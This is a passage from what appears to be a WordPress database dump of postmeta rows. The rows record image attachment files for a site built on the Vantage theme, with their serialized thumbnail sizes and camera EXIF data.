4:\"file\";s:21:\"Carly-090-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-090-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"Carly-090-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Carly-090-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Carly-090-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Carly-090-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"Carly-090-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1187184232\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"72\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(571,290,'_wp_attached_file','2017/01/Carly-092.jpg'),(572,290,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:21:\"2017/01/Carly-092.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-092-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Carly-092-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-092-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-092-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-092-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"Carly-092-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Carly-092-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Carly-092-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Carly-092-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"Carly-092-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1187188373\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"41.5\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(573,291,'_wp_attached_file','2017/01/Carly-106.jpg'),(574,291,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:21:\"2017/01/Carly-106.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-106-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Carly-106-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-106-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-106-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-106-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"Carly-106-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Carly-106-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Carly-106-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Carly-106-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"Carly-106-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1185204865\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.3\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(575,292,'_wp_attached_file','2017/01/Carly-107.jpg'),(576,292,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:21:\"2017/01/Carly-107.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-107-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Carly-107-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-107-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-107-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-107-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"Carly-107-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Carly-107-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Carly-107-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Carly-107-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"Carly-107-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1182349206\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"71.3\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(577,293,'_wp_attached_file','2017/01/Carly-124.jpg'),(578,293,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:21:\"2017/01/Carly-124.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-124-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Carly-124-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-124-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-124-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-124-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"Carly-124-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Carly-124-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Carly-124-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Carly-124-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"Carly-124-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1187190159\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"18.6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(579,294,'_wp_attached_file','2017/01/Carly-129.jpg'),(580,294,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:21:\"2017/01/Carly-129.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-129-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Carly-129-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-129-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-129-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-129-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"Carly-129-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Carly-129-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Carly-129-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Carly-129-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:21:\"Carly-129-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1187190185\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"8\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(584,297,'_wp_attached_file','2017/01/kitchenetteinterior.jpg'),(585,297,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:31:\"2017/01/kitchenetteinterior.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:31:\"kitchenetteinterior-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1041897600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:4:\"2832\";s:13:\"shutter_speed\";s:15:\"0.0833333333333\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(586,298,'_wp_attached_file','2017/01/Kussatz.jpg'),(587,298,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:19:\"2017/01/Kussatz.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Kussatz-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Kussatz-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"Kussatz-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"Kussatz-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Kussatz-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:19:\"Kussatz-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"Kussatz-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"Kussatz-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"Kussatz-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"Kussatz-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1186169425\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(588,299,'_wp_attached_file','2017/01/MapquestMap.jpg'),(589,299,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:432;s:6:\"height\";i:390;s:4:\"file\";s:23:\"2017/01/MapquestMap.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"MapquestMap-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"MapquestMap-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:23:\"MapquestMap-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:23:\"MapquestMap-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"MapquestMap-432x380.jpg\";s:5:\"width\";i:432;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:23:\"MapquestMap-432x380.jpg\";s:5:\"width\";i:432;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:23:\"MapquestMap-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:23:\"MapquestMap-432x272.jpg\";s:5:\"width\";i:432;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:23:\"MapquestMap-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(590,300,'_wp_attached_file','2017/01/mobilehome13interior.jpg'),(591,300,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:32:\"2017/01/mobilehome13interior.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:32:\"mobilehome13interior-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1041897600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:4:\"7488\";s:13:\"shutter_speed\";s:15:\"0.0833333333333\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(592,301,'_wp_attached_file','2017/01/mobilehome13interior2.jpg'),(593,301,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:33:\"2017/01/mobilehome13interior2.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:33:\"mobilehome13interior2-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i: